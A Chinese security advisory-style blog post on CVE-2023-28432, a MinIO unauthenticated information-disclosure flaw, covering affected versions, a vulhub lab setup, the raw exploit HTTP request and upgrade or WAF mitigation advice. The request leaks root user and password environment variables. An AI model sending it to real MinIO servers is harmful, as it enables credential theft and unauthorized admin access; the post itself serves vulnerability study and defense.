漏洞说明
MinIO verify接口(未授权问题)存在敏感信息泄漏漏洞,攻击者通过构造特殊URL地址,读取系统敏感信息,其中包括环境变量,有的服务器还会获取到AK/SK,获取后可直接登录后台。此漏洞影响集群节点,单节点不受影响 。
MinIo
MinIO 是一种开源的对象存储服务,它兼容 Amazon S3 API,可以在私有云或公有云中使用。MinIO 是一种高性能、高可用性的分布式存储系统,它可以存储大量数据,并提供对数据的高速读写能力。MinIO 采用分布式架构,可以在多个节点上运行,从而实现数据的分布式存储和处理。
影响版本
RELEASE.2019-12-17T23-16-33Z <= MinIo < RELEASE.2023-03-20T20-16-18Z漏洞复现
环境搭建使用P🐮的vulhub进行启动:
https://github.com/vulhub/vulhub/tree/master/minio/CVE-2023-28432
docker-compose up -d启动后访问 http://ip:9001,可以查看Web管理页面, http://ip:9000是API服务。
POC:
https://github.com/Henry4E36/POCS/tree/main/Minio
POST/minio/bootstrap/v1/verifyHTTP/1.1Host: ip:9000User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0Accept-Encoding: gzip, deflateAccept: */*Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 0
其中包含 MINIO_ROOT_USER 和 MINIO_ROOT_PASSWORD 。使用这个账号密码,即可成功登录管理后台
修复建议
1、升级到安全版本RELEASE.2023-03-20T20-16-18Z,下载链接:
https://github.com/minio/minio/releases/tag/RELEASE.2023-03-20T20-16-18Z
2、临时修复方案,在waf上配置策略,拒绝所有post到/minio/bootstrap/v1/verify的请求。
本文章仅用于学习交流,不得用于非法用途
原文始发于微信公众号(才疏学浅的H6):(CVE-2023-28432) | MinIO verify 接口敏感信息泄露漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论